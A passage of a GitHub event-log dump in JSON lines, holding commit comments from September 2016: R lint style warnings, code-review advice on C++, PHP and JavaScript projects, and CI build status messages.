tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots)\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T14:59:22Z"}
{"id":"4596821735","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19115167,"position":256,"line":1274,"path":"generators/generator-base.js","commit_id":"7c72054d786ae2c91823769a31d4e7774bbc9ab3","created_at":"2016-09-21T14:59:39Z","updated_at":"2016-09-21T14:59:39Z","body":"Oops im fixing it asap. Im not getting the error in windows not sure why"}},"created_at":"2016-09-21T14:59:39Z"}
{"id":"4596822745","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":19115171,"position":null,"line":null,"path":null,"commit_id":"787cb81986e2356686be92d0acea90e11ccfeec7","created_at":"2016-09-21T14:59:48Z","updated_at":"2016-09-21T14:59:48Z","body":"I'm not proposing to merge it now, but I read and tested the changes up to this commit and they are looking so good.\r\nFor me they are good enough to think that it worth it to update the online docs with this fixes (after you will say that they are ready for merge)."}},"created_at":"2016-09-21T14:59:48Z"}
{"id":"4596824958","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19115175,"position":null,"line":null,"path":null,"commit_id":"75567a5cf6b0cb13e648871f7c09e81ee8c3469c","created_at":"2016-09-21T15:00:09Z","updated_at":"2016-09-21T15:00:09Z","body":"OOPS, not #229. It was #239 "}},"created_at":"2016-09-21T15:00:09Z"}
{"id":"4596827693","type":"CommitCommentEvent","actor":{"login":"jstejada"},"repo":{"name":"nylas/N1"},"payload":{"comment":{"id":19115181,"position":13,"line":64,"path":"package.json","commit_id":"18f7a8d463cfe243b329e98f7676c84df7b8e133","created_at":"2016-09-21T15:00:30Z","updated_at":"2016-09-21T15:00:30Z","body":"should we use the `x.x` format instead, which I think makes it easier to understand? e.g. `15.3.x`?\r\nI think as it is this will actually match `15.x.x`, which is different from the commit message"}},"created_at":"2016-09-21T15:00:30Z"}
{"id":"4596829889","type":"CommitCommentEvent","actor":{"login":"sporkd2"},"repo":{"name":"bernokl/mysql-formula-bernokl"},"payload":{"comment":{"id":19115183,"position":4,"line":4,"path":"salt/roots/mysql-server/init.sls","commit_id":"5fc380c62c00be78d5b69e8a5a728c468a49c36c","created_at":"2016-09-21T15:00:51Z","updated_at":"2016-09-21T15:00:51Z","body":"pkgs is only needed when defining multiple."}},"created_at":"2016-09-21T15:00:51Z"}
{"id":"4596830262","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":19115186,"position":5,"line":107,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"73e7712390b7b0e79dd02fbc69c6e24973d599aa","created_at":"2016-09-21T15:00:54Z","updated_at":"2016-09-21T15:00:54Z","body":"https://github.com/exo-addons/chat-application/commit/11a40f6ebbeafe17ec4fcb3dec9bf479ce8fbde4"}},"created_at":"2016-09-21T15:00:54Z"}
{"id":"4596832056","type":"CommitCommentEvent","actor":{"login":"jchesterpivotal"},"repo":{"name":"cloudfoundry/stacks"},"payload":{"comment":{"id":19115187,"position":null,"line":null,"path":null,"commit_id":"1f4f1b9ab68f291f4dd5c906248d0a0c0d777616","created_at":"2016-09-21T15:01:12Z","updated_at":"2016-09-21T15:01:12Z","body":"Was actually Anna Thornton and I."}},"created_at":"2016-09-21T15:01:12Z"}
{"id":"4596834711","type":"CommitCommentEvent","actor":{"login":"boydkr"},"repo":{"name":"Russ226/Poker-hands"},"payload":{"comment":{"id":19115194,"position":4,"line":4,"path":"deckofcards/Deck.h","commit_id":"a2a86096a2042eb7f6528e454cce2e63844a5c97","created_at":"2016-09-21T15:01:37Z","updated_at":"2016-09-21T15:01:37Z","body":"`using namespace std` is a bad practice. results in namespace conflicts in large projects"}},"created_at":"2016-09-21T15:01:37Z"}
{"id":"4596837309","type":"CommitCommentEvent","actor":{"login":"boydkr"},"repo":{"name":"Russ226/Poker-hands"},"payload":{"comment":{"id":19115201,"position":22,"line":22,"path":"deckofcards/Typesofhand.cpp","commit_id":"a2a86096a2042eb7f6528e454cce2e63844a5c97","created_at":"2016-09-21T15:02:00Z","updated_at":"2016-09-21T15:02:00Z","body":"sort `hand` first to simplify"}},"created_at":"2016-09-21T15:02:00Z"}
{"id":"4596839916","type":"CommitCommentEvent","actor":{"login":"JCMais"},"repo":{"name":"phalconslayer/slayer"},"payload":{"comment":{"id":19115207,"position":null,"line":null,"path":null,"commit_id":"8896a6ab9e5c18771b9060381f82c5329afd36b1","created_at":"2016-09-21T15:02:22Z","updated_at":"2016-09-21T15:02:22Z","body":"Hi! Would not it be better to return earlier if headers_sent is true?\r\nThat way we avoid checking on every statement later.\r\n\r\n```php\r\nif ( headers_sent() ) {\r\n    return;\r\n}\r\n```"}},"created_at":"2016-09-21T15:02:22Z"}
{"id":"4596839993","type":"CommitCommentEvent","actor":{"login":"Devwarlt"},"repo":{"name":"Devwarlt/webclient"},"payload":{"comment":{"id":19115208,"position":null,"line":null,"path":null,"commit_id":"0610e943d4a621b4f0823aafe1eead46e9248660","created_at":"2016-09-21T15:02:23Z","updated_at":"2016-09-21T15:02:23Z","body":"Webclient AGCLoEBuild"}},"created_at":"2016-09-21T15:02:23Z"}
{"id":"4596845859","type":"CommitCommentEvent","actor":{"login":"boydkr"},"repo":{"name":"Russ226/Poker-hands"},"payload":{"comment":{"id":19115216,"position":18,"line":18,"path":"deckofcards/Deck.cpp","commit_id":"a2a86096a2042eb7f6528e454cce2e63844a5c97","created_at":"2016-09-21T15:03:10Z","updated_at":"2016-09-21T15:03:10Z","body":"Use ints instead of strings to represent card ranks and suits, and use consts to refer to them in code.  This will simplify a lot of your hand logic (and run slightly faster)"}},"created_at":"2016-09-21T15:03:10Z"}
{"id":"4596846026","type":"CommitCommentEvent","actor":{"login":"rim-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19115217,"position":null,"line":null,"path":null,"commit_id":"5c6087e38ee671ad5a3cf5aaa501d2a46af49872","created_at":"2016-09-21T15:03:11Z","updated_at":"2016-09-21T15:03:11Z","body":"![](http://i.giphy.com/IY4Sek4eOx52o.gif)"}},"created_at":"2016-09-21T15:03:11Z"}
{"id":"4596850279","type":"CommitCommentEvent","actor":{"login":"boydkr"},"repo":{"name":"Russ226/Poker-hands"},"payload":{"comment":{"id":19115232,"position":18,"line":18,"path":"deckofcards/Deck.cpp","commit_id":"a2a86096a2042eb7f6528e454cce2e63844a5c97","created_at":"2016-09-21T15:03:49Z","updated_at":"2016-09-21T15:03:49Z","body":"a `card` object would probably serve you well, also"}},"created_at":"2016-09-21T15:03:49Z"}
{"id":"4596850418","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115233,"position":null,"line":null,"path":null,"commit_id":"c6925857282ce1688b77c5b8550ba98a827cabc3","created_at":"2016-09-21T15:03:50Z","updated_at":"2016-09-21T15:03:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1083](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13786&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:08:55"}},"created_at":"2016-09-21T15:03:50Z"}
{"id":"4596851991","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19115234,"position":null,"line":null,"path":null,"commit_id":"d1cecfa132a9a5d8896a2ae34c528b40ea25d111","created_at":"2016-09-21T15:04:04Z","updated_at":"2016-09-21T15:04:04Z","body":"What I don't like is the inability to write JSX code:\r\n```js\r\nreturn React.DOM.div({\r\n  style: {\r\n  backgroundColor: '#9999ff',\r\n    height: '20px',\r\n    padding: '5px'\r\n  }\r\n}, (\r\n  'Welcome to this React Component dear ' + this.props.fname + ' ' + this.props.lname + '.'\r\n));\r\n```\r\n\r\n... and it would also be nice to be able to write ES6 code, like so:\r\n\r\n```jsx\r\nimport React, { Component, PropTypes } from 'react'\r\n\r\nclass Hello extends Component {\r\n  constructor(props) {\r\n    super(props)\r\n  }\r\n\r\n  render() {\r\n    const { fname, lname } = this.props\r\n\r\n    return <div style={{\r\n      backgroundColor: '#9999ff',\r\n      height: '20px',\r\n      padding: '5px'\r\n    }}>Welcome to React dear {fname} {lname} !</div>\r\n  }\r\n}\r\n\r\nHello.propTypes = {\r\n  fname: PropTypes.string.isRequired, \r\n  lname: PropTypes.string.isRequired\r\n}\r\n\r\nexport default Hello\r\n```\r\n\r\n**Notice** how we don't write any `;` besides all the other major improvements and understability of what the code is actually doing 😃 "}},"created_at":"2016-09-21T15:04:04Z"}
{"id":"4596853471","type":"CommitCommentEvent","actor":{"login":"matthewware"},"repo":{"name":"BBN-Q/QGL"},"payload":{"comment":{"id":19115236,"position":null,"line":null,"path":null,"commit_id":"a2be5718e954050e36d4be3d782d99b7319c6a57","created_at":"2016-09-21T15:04:16Z","updated_at":"2016-09-21T15:04:16Z","body":"No that wasn't me.  I'm similarly confused about what it's supposed to do."}},"created_at":"2016-09-21T15:04:16Z"}
{"id":"4596862709","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19115255,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-21T15:05:29Z","updated_at":"2016-09-21T15:05:29Z","body":"Danke!"}},"created_at":"2016-09-21T15:05:29Z"}
{"id":"4596862853","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19115256,"position":34,"line":172,"path":"Common/Data/Market/OptionContract.cs","commit_id":"b3590647b50d2103b1eb110740cccdb87218eb90","created_at":"2016-09-21T15:05:30Z","updated_at":"2016-09-21T15:05:30Z","body":"rogue comment :)"}},"created_at":"2016-09-21T15:05:30Z"}
{"id":"4596865084","type":"CommitCommentEvent","actor":{"login":"boydkr"},"repo":{"name":"Russ226/Poker-hands"},"payload":{"comment":{"id":19115262,"position":4,"line":4,"path":"deckofcards/Typesofhand.h","commit_id":"a2a86096a2042eb7f6528e454cce2e63844a5c97","created_at":"2016-09-21T15:05:51Z","updated_at":"2016-09-21T15:05:51Z","body":"Try to avoid `#include` in `.h` files if you can help it.  Forward declaration works just as well in most cases"}},"created_at":"2016-09-21T15:05:51Z"}
{"id":"4596865532","type":"CommitCommentEvent","actor":{"login":"MartinMajor"},"repo":{"name":"nette/di"},"payload":{"comment":{"id":19115263,"position":8,"line":89,"path":"src/DI/PhpReflection.php","commit_id":"5adb374d919c57a84491d1fde5f3b119fd55bd05","created_at":"2016-09-21T15:05:55Z","updated_at":"2016-09-21T15:05:55Z","body":"We could change this to:\r\n```php\r\n\t\t$type = ltrim(preg_replace('#[|\\s].*#', '', (string) self::parseAnnotation($func, 'return')), '?');\r\n```\r\nto allow `?` in annotations as well."}},"created_at":"2016-09-21T15:05:55Z"}
{"id":"4596868121","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115271,"position":null,"line":null,"path":null,"commit_id":"c6925857282ce1688b77c5b8550ba98a827cabc3","created_at":"2016-09-21T15:06:18Z","updated_at":"2016-09-21T15:06:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1084](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13791&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T15:06:18Z"}
{"id":"4596868607","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115273,"position":null,"line":null,"path":null,"commit_id":"da1b67076ebdcd3f1d9ff1db89e3d2c3ce5cb787","created_at":"2016-09-21T15:06:23Z","updated_at":"2016-09-21T15:06:23Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1085](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13792&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T15:06:23Z"}
{"id":"4596873033","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/di"},"payload":{"comment":{"id":19115285,"position":8,"line":89,"path":"src/DI/PhpReflection.php","commit_id":"5adb374d919c57a84491d1fde5f3b119fd55bd05","created_at":"2016-09-21T15:07:03Z","updated_at":"2016-09-21T15:07:03Z","body":"IMHO annotations are dead"}},"created_at":"2016-09-21T15:07:03Z"}
{"id":"4596874894","type":"CommitCommentEvent","actor":{"login":"tomas-stefano"},"repo":{"name":"moneyadviceservice/rad"},"payload":{"comment":{"id":19115286,"position":null,"line":null,"path":null,"commit_id":"d0620809074890168f6a9044fe1aed06176cd44e","created_at":"2016-09-21T15:07:19Z","updated_at":"2016-09-21T15:07:19Z","body":"👍 "}},"created_at":"2016-09-21T15:07:19Z"}
{"id":"4596881389","type":"CommitCommentEvent","actor":{"login":"rushmorem"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19115294,"position":null,"line":null,"path":null,"commit_id":"18e12537d00c46c91c8b032e99f01b039fe6d9f8","created_at":"2016-09-21T15:08:18Z","updated_at":"2016-09-21T15:08:18Z","body":"Yes `cockroachdb` doesn't support 32bit platforms at the moment. It was an oversight on my part. I have now fixed this. Thanks!"}},"created_at":"2016-09-21T15:08:18Z"}
{"id":"4596881551","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19115295,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-21T15:08:20Z","updated_at":"2016-09-21T15:08:20Z","body":"Про умные указатели, можете почитать вот мануал: \r\nhttp://www.cplusplus.com/reference/memory/shared_ptr/\r\nhttp://www.cplusplus.com/reference/memory/auto_ptr/\r\n\r\nНасколько я понял, Вы и так Input() убрали, на что я не возражаю."}},"created_at":"2016-09-21T15:08:20Z"}
{"id":"4596885922","type":"CommitCommentEvent","actor":{"login":"danielvijge"},"repo":{"name":"danielvijge/redmine_backlogs"},"payload":{"comment":{"id":19115302,"position":6,"line":13,"path":"app/controllers/rb_taskboards_controller.rb","commit_id":"cb96f11e832cf5b975d067c03688a800a53609b7","created_at":"2016-09-21T15:08:58Z","updated_at":"2016-09-21T15:08:58Z","body":"Trackers can be both Story trackers and Task trackers. This would create a strange task board where an issue can both be a story (have a row), and appear as a task of another story. To prevent this, any trackers that are also stories are not shown as tasks. Not the best solution, but it works for now"}},"created_at":"2016-09-21T15:08:58Z"}
{"id":"4596887547","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"kodi-game/game.libretro"},"payload":{"comment":{"id":19115305,"position":5,"line":8,"path":"game.libretro/addon.xml.in","commit_id":"b9603eb1e3eb98ca917280ea23ad3ec13f1c9e6a","created_at":"2016-09-21T15:09:13Z","updated_at":"2016-09-21T15:09:13Z","body":"@a1rwulf was this the missing version bump you were talking about?"}},"created_at":"2016-09-21T15:09:13Z"}
{"id":"4596897649","type":"CommitCommentEvent","actor":{"login":"tomas-stefano"},"repo":{"name":"moneyadviceservice/rad"},"payload":{"comment":{"id":19115320,"position":null,"line":null,"path":null,"commit_id":"812aa749c41b791c05f9c63fbba4d7eafe937223","created_at":"2016-09-21T15:10:44Z","updated_at":"2016-09-21T15:10:44Z","body":"If I am not mistaken, you will need to add <@#{user}> to the text message. "}},"created_at":"2016-09-21T15:10:44Z"}
{"id":"4596899264","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115325,"position":null,"line":null,"path":null,"commit_id":"531b28ba7e5828b05a2b3bcc6ea90786f9be33bf","created_at":"2016-09-21T15:11:00Z","updated_at":"2016-09-21T15:11:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1086](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13795&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T15:11:00Z"}
{"id":"4596900738","type":"CommitCommentEvent","actor":{"login":"danielvijge"},"repo":{"name":"danielvijge/redmine_backlogs"},"payload":{"comment":{"id":19115329,"position":7,"line":14,"path":"app/controllers/rb_taskboards_controller.rb","commit_id":"cb96f11e832cf5b975d067c03688a800a53609b7","created_at":"2016-09-21T15:11:11Z","updated_at":"2016-09-21T15:11:11Z","body":"If the task board has multiple task trackers, the statuses can be quick a lot. So it is recommended that all tracker items that do appear on the task board have the same workflow. (Trackers that are also story trackers do not appear on the task board, and can this have a different workflow without leading to a lot of statuses on the task board)."}},"created_at":"2016-09-21T15:11:11Z"}
{"id":"4596903529","type":"CommitCommentEvent","actor":{"login":"MartinMajor"},"repo":{"name":"nette/di"},"payload":{"comment":{"id":19115330,"position":8,"line":89,"path":"src/DI/PhpReflection.php","commit_id":"5adb374d919c57a84491d1fde5f3b119fd55bd05","created_at":"2016-09-21T15:11:35Z","updated_at":"2016-09-21T15:11:35Z","body":"Ok, you are right that with PHP 7.1 there is no need for them."}},"created_at":"2016-09-21T15:11:35Z"}
{"id":"4596905377","type":"CommitCommentEvent","actor":{"login":"danielvijge"},"repo":{"name":"danielvijge/redmine_backlogs"},"payload":{"comment":{"id":19115333,"position":5,"line":33,"path":"app/helpers/rb_partials_helper.rb","commit_id":"cb96f11e832cf5b975d067c03688a800a53609b7","created_at":"2016-09-21T15:11:52Z","updated_at":"2016-09-21T15:11:52Z","body":"Trackers can be both Story trackers and Task trackers. This would create a strange task board where an issue can both be a story (have a row), and appear as a task of another story. To prevent this, any trackers that are also stories are not shown as tasks. Not the best solution, but it works for now"}},"created_at":"2016-09-21T15:11:52Z"}
{"id":"4596906390","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19115339,"position":6,"line":3338,"path":"src/server/game/Maps/Map.cpp","commit_id":"820e8433917fe27c4a1093482532c6986b519e1f","created_at":"2016-09-21T15:12:02Z","updated_at":"2016-09-21T15:12:02Z","body":"But they allow you to have a very significant performance gain in some cases (and our log system is one of those)"}},"created_at":"2016-09-21T15:12:02Z"}
{"id":"4596907132","type":"CommitCommentEvent","actor":{"login":"daison12006013"},"repo":{"name":"phalconslayer/slayer"},"payload":{"comment":{"id":19115340,"position":null,"line":null,"path":null,"commit_id":"8896a6ab9e5c18771b9060381f82c5329afd36b1","created_at":"2016-09-21T15:12:09Z","updated_at":"2016-09-21T15:12:09Z","body":"planning to do that way, :+1: "}},"created_at":"2016-09-21T15:12:09Z"}
{"id":"4596908291","type":"CommitCommentEvent","actor":{"login":"Bubadabado"},"repo":{"name":"Pranoydll/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":19115343,"position":null,"line":null,"path":null,"commit_id":"0f89a38eef454b4029ccd3d491ec9bd5fcf5d698","created_at":"2016-09-21T15:12:18Z","updated_at":"2016-09-21T15:12:18Z","body":"The sidebar is doing weird stuff in the updated version. It moves out a grey rectangle and to the right of that the black box."}},"created_at":"2016-09-21T15:12:18Z"}
{"id":"4596911158","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19115351,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T15:12:44Z","updated_at":"2016-09-21T15:12:44Z","body":"Re: Removal of SaltRenderError in state/pkg.py\r\nOriginal Lines\r\n```\r\n# SaltRenderError required by win_pkg\t\t\r\n# pylint: disable=W0611\t\t\r\n  from salt.exceptions import (\t\t  from salt.exceptions import (\r\n    CommandExecutionError, MinionError, SaltInvocationError,\r\n    SaltRenderError\t\t\r\n  )\r\n```\r\nI added this because salt \"stack trace\" without it.  How did you discover or test it was no longer required? \r\nFrom modules/pkg.py\r\n```\r\n    except SaltRenderError as exc:\r\n        msg = 'Failed to compile \\'{0}\\': {1}'.format(short_path_name, exc)\r\n        return _failed_compile(msg)\r\n```\r\n"}},"created_at":"2016-09-21T15:12:44Z"}
{"id":"4596921194","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115371,"position":null,"line":null,"path":null,"commit_id":"c6925857282ce1688b77c5b8550ba98a827cabc3","created_at":"2016-09-21T15:14:16Z","updated_at":"2016-09-21T15:14:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1084](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13791&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 221, ignored: 3 Build time: 00:07:58\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T15:14:16Z"}
{"id":"4596921198","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19115370,"position":256,"line":1274,"path":"generators/generator-base.js","commit_id":"7c72054d786ae2c91823769a31d4e7774bbc9ab3","created_at":"2016-09-21T15:14:16Z","updated_at":"2016-09-21T15:14:16Z","body":"sorry guys im pushing a fix now"}},"created_at":"2016-09-21T15:14:16Z"}
{"id":"4596924007","type":"CommitCommentEvent","actor":{"login":"NeilvB"},"repo":{"name":"alphagov/support"},"payload":{"comment":{"id":19115374,"position":null,"line":null,"path":null,"commit_id":"8ea3f1d66fb79ea4323165fbe98e6873fe126aef","created_at":"2016-09-21T15:14:41Z","updated_at":"2016-09-21T15:14:41Z","body":"Kibana log searches for the above:"}},"created_at":"2016-09-21T15:14:41Z"}
{"id":"4596928827","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19115382,"position":null,"line":null,"path":null,"commit_id":"bec41cfbb0b049fef05e697446ff38f73f808e92","created_at":"2016-09-21T15:15:24Z","updated_at":"2016-09-21T15:15:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;bPxKPqh2&#x2F;23-partager-la-configuration-pour-le-fichier-films-csv\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> partager la configuration pour le fichier films.csv</a>"}},"created_at":"2016-09-21T15:15:24Z"}
